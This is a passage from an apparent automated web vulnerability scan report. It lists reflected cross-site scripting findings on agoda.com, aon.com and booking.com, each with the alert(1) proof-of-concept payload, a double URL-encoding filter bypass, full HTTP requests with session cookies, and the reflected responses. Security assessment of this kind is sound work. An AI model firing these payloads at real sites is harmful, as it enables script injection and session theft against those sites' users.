Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=usyvurhj5s34qtup52oltx1d; agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:37$10-02-2012 07:37$; agodalbny=www.agoda.com_cluster_31; __utma=1.939961377.1317602256.1317602256.1317602256.1; __utmb=1.1.10.1317602256; __utmc=1; __utmz=1.1317602256.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Mon, 03 Oct 2011 00:40:29 GMT
Content-Length: 364
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate


<html xmlns="http://www.w3.org/1999/xhtml">
<head></head>
<body>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://googleads.g.doubleclick.net/pagead/viewthroughconversion/985248306d825c"onerror="alert(1)"2170802e0bd/?label=M6MLCJbtiQIQsuTm1QM&guid=ON&script=0" />
...[SNIP]...

4.158. http://www.agoda.com/pages/agoda/default/page_AdScript.aspx [conversionLabel parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.agoda.com
Path:   /pages/agoda/default/page_AdScript.aspx

Issue detail

The value of the conversionLabel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a299"onerror%3d"alert(1)"d0370ac32b was submitted in the conversionLabel parameter. This input was echoed as 5a299"onerror="alert(1)"d0370ac32b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /pages/agoda/default/page_AdScript.aspx?type=R&pagetypeid=1&conversionID=985248306&conversionLabel=M6MLCJbtiQIQsuTm1QM5a299"onerror%3d"alert(1)"d0370ac32b&_=1317602266727 HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=usyvurhj5s34qtup52oltx1d; agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:37$10-02-2012 07:37$; agodalbny=www.agoda.com_cluster_31; __utma=1.939961377.1317602256.1317602256.1317602256.1; __utmb=1.1.10.1317602256; __utmc=1; __utmz=1.1317602256.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Mon, 03 Oct 2011 00:40:34 GMT
Content-Length: 363
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate


<html xmlns="http://www.w3.org/1999/xhtml">
<head></head>
<body>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://googleads.g.doubleclick.net/pagead/viewthroughconversion/985248306/?label=M6MLCJbtiQIQsuTm1QM5a299"onerror="alert(1)"d0370ac32b&guid=ON&script=0" />
...[SNIP]...

4.159. http://www.aon.com/site/search.jsp [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aon.com
Path:   /site/search.jsp

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43d71%2522%253balert%25281%2529%252f%252fe60ed69120c was submitted in the q parameter. This input was echoed as 43d71";alert(1)//e60ed69120c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the q request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site/search.jsp?entqr=3&output=xml_no_dtd&entspa=a&sort=date%3AD%3AL%3Ad1&client=default_frontend&ud=1&oe=UTF-8&ie=UTF-8&OPN=RT1&num=5&start=0&site=AONCOM_ENGLISH&q=xss+txt+css+img+help+faq43d71%2522%253balert%25281%2529%252f%252fe60ed69120c&x=7&y=9 HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/site/products-services.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/site/products-services.jsp%7C1317601842083%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daoncomprod%253D%252526pid%25253D/site/products-services.jsp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.aon.com/siteImages/search_btn.gif%252526ot%25253DIMAGE%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Date: Mon, 03 Oct 2011 00:03:03 GMT
Content-Length: 83645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.prop5="null:xss txt css img help faq43d71";alert(1)//e60ed69120c";
s.prop6="zero";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.160. http://www.aon.com/site/search.jsp [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aon.com
Path:   /site/search.jsp

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 56e10%253cscript%253ealert%25281%2529%253c%252fscript%253e071d053f505 was submitted in the q parameter. This input was echoed as 56e10<script>alert(1)</script>071d053f505 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the q request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site/search.jsp?entqr=3&output=xml_no_dtd&entspa=a&sort=date%3AD%3AL%3Ad1&client=default_frontend&ud=1&oe=UTF-8&ie=UTF-8&OPN=RT1&num=5&start=0&site=AONCOM_ENGLISH&q=xss+txt+css+img+help+faq56e10%253cscript%253ealert%25281%2529%253c%252fscript%253e071d053f505&x=7&y=9 HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/site/products-services.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/site/products-services.jsp%7C1317601842083%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daoncomprod%253D%252526pid%25253D/site/products-services.jsp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.aon.com/siteImages/search_btn.gif%252526ot%25253DIMAGE%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Date: Mon, 03 Oct 2011 00:03:06 GMT
Content-Length: 83697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<h2 class="searchpage">No Results Found results found for "xss txt css img help faq56e10<script>alert(1)</script>071d053f505"</h2>
...[SNIP]...

4.161. http://www.aon.com/site/search.jsp [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aon.com
Path:   /site/search.jsp

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e78b9cfe1f84 was submitted in the q parameter. This input was echoed as 15a53"><script>alert(1)</script>78b9cfe1f84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the q request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site/search.jsp?entqr=3&output=xml_no_dtd&entspa=a&sort=date%3AD%3AL%3Ad1&client=default_frontend&ud=1&oe=UTF-8&ie=UTF-8&OPN=RT1&num=5&start=0&site=AONCOM_ENGLISH&q=xss+txt+css+img+help+faq15a53%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e78b9cfe1f84&x=7&y=9 HTTP/1.1
Host: www.aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aon.com/site/products-services.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FDA5F4B4BB1AB049D12027B006BB7DA5; s_pers=%20gpv_pageName%3D/site/products-services.jsp%7C1317601842083%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daoncomprod%253D%252526pid%25253D/site/products-services.jsp%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.aon.com/siteImages/search_btn.gif%252526ot%25253DIMAGE%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Date: Mon, 03 Oct 2011 00:03:00 GMT
Content-Length: 83705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<input type="hidden" name="q" value="xss txt css img help faq15a53"><script>alert(1)</script>78b9cfe1f84">
...[SNIP]...

4.162. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6709"><script>alert(1)</script>e4671514908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotelb6709"><script>alert(1)</script>e4671514908/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:16:46 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55636
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/hotelb6709"><script>alert(1)</script>e4671514908/us/c-boston-massachusettes.html" />
...[SNIP]...

4.163. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a55ac'%3balert(1)//1b974513244 was submitted in the REST URL parameter 1. This input was echoed as a55ac';alert(1)//1b974513244 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotela55ac'%3balert(1)//1b974513244/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:16:49 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55552
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ooking.env.b_site_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotela55ac';alert(1)//1b974513244/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';
...[SNIP]...

4.164. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb14a'%3balert(1)//0bc95a6ed04 was submitted in the REST URL parameter 2. This input was echoed as eb14a';alert(1)//0bc95a6ed04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/useb14a'%3balert(1)//0bc95a6ed04/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:16:55 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55537
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ing.env.b_site_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/useb14a';alert(1)//0bc95a6ed04/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';



...[SNIP]...

4.165. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6994"><script>alert(1)</script>e9338c63c3f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/usc6994"><script>alert(1)</script>e9338c63c3f/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
